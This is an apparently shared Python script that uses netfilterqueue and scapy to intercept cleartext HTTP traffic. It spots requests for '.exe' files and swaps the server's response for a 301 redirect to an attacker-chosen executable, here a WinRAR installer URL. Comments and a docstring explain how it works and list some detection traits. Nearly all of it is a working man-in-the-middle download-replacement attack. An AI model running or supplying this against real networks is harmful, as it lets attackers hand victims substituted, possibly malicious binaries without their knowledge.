
Untitled

a guest
Jul 29th, 2020
  1. #!/usr/bin/env python
  2. import netfilterqueue
  3. import scapy.all as scapy
  4.  
  5.  
# TCP ACK numbers taken from outbound port-80 requests whose payload contained
# 'exe'. process_packet() compares the sequence number of later port-80
# responses against this list. Entries are removed only when a response
# matches, so the list is otherwise unbounded.
ack_list = []
def process_packet(packet):
    """NFQUEUE callback: inspect one queued IP packet, then release it.

    The queued payload is parsed as a scapy IP packet so its layers can be
    read and modified. Only packets carrying a Raw (application data) layer
    are examined:

    * Destination port 80 (outbound HTTP request): if the payload contains
      the substring 'exe', the segment's ACK number is stored in ack_list.
    * Source port 80 (inbound HTTP response): if the segment's sequence
      number is in ack_list, the payload is replaced with an HTTP 301
      redirect and the modified packet is written back to the queue entry.

    Every packet that gets this far is accepted, modified or not.

    Analyst notes: this is on-path tampering with cleartext HTTP, so it has
    no effect on traffic protected by TLS, and a download whose hash or
    signature is verified out-of-band exposes the substitution. Observable
    traits of the injected response include an unexpected 301 for a binary
    download and bare '\n' line endings instead of CRLF.

    NOTE(review): the str-based payload handling suggests Python 2 --
    confirm. A packet with a Raw layer but no TCP layer raises on the TCP
    lookup before accept() is reached.
    """
    parsed = scapy.IP(packet.get_payload())

    if parsed.haslayer(scapy.Raw):
        tcp_layer = parsed[scapy.TCP]

        if tcp_layer.dport == 80:
            # Outbound request: remember which response to look for.
            requests_exe = 'exe' in parsed[scapy.Raw].load
            if requests_exe:
                print('[+] exe Request')
                ack_list.append(tcp_layer.ack)
        elif tcp_layer.sport == 80 and tcp_layer.seq in ack_list:
            # Inbound response whose seq equals a stored request ACK.
            ack_list.remove(tcp_layer.seq)
            print('[+] Replacing file')
            parsed[scapy.Raw].load = 'HTTP/1.1 301 Moved Permanently\nLocation: https://www.rarlab.com/rar/wrar591ru.exe\n\n'
            # Drop the length and checksum fields so scapy recomputes them
            # for the changed payload when the packet is serialized.
            stale_fields = (
                (scapy.IP, 'len'),
                (scapy.IP, 'chksum'),
                (scapy.TCP, 'chksum'),
            )
            for layer, field in stale_fields:
                delattr(parsed[layer], field)
            packet.set_payload(str(parsed))

    packet.accept()
  30.  
  31.  
  32.  
  33.  
queue = netfilterqueue.NetfilterQueue()
# Bind to the iptables NFQUEUE so this script gets access to the queued packets.
# process_packet is the callback executed for each packet trapped in the queue.
# 0 is the queue number; it must match the number given in the iptables rule.
queue.bind(0, process_packet)
# Start processing queued packets; each one is handed to process_packet.
queue.run()